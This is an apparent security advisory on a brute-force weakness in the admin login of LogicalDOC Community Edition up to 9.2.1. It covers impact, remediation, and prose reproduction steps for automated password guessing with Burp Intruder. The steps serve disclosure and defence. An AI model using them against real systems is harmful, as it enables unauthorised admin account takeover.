LogicalDOC Community Edition Brute Force Vulnerability in Admin Login Page

A vulnerability exists in LogicalDOC Community Edition versions through 9.2.1, specifically in the admin login page's authentication process. The issue allows for excessive authentication attempts to be made, as the application lacks proper safeguards such as account lockout, rate limiting, or CAPTCHA. This vulnerability can be exploited remotely, with public proof-of-concept available.

Impact

Exploitation of this vulnerability could lead to unauthorized administrative access, allowing an attacker to take over admin accounts, access sensitive documents, modify or delete data, create privileged accounts, and potentially maintain persistence after the initial compromise.

Reproduction

To reproduce this vulnerability, navigate to the login page and capture a login request using Burp Suite. Send the request to Burp Intruder, fix the username parameter, and set the password parameter as a payload position. Load a password list into Intruder and launch the attack. Successful login attempts can be identified by a change in the response status code and length, allowing for automated password guessing and admin account takeover.

Remediation

It is recommended to implement account lockout or progressive rate-limiting after failed authentication attempts, enforce multi-factor authentication for admin accounts, normalize authentication response times, introduce CAPTCHA after suspicious activity, and block or throttle IPs that exhibit automated attack patterns.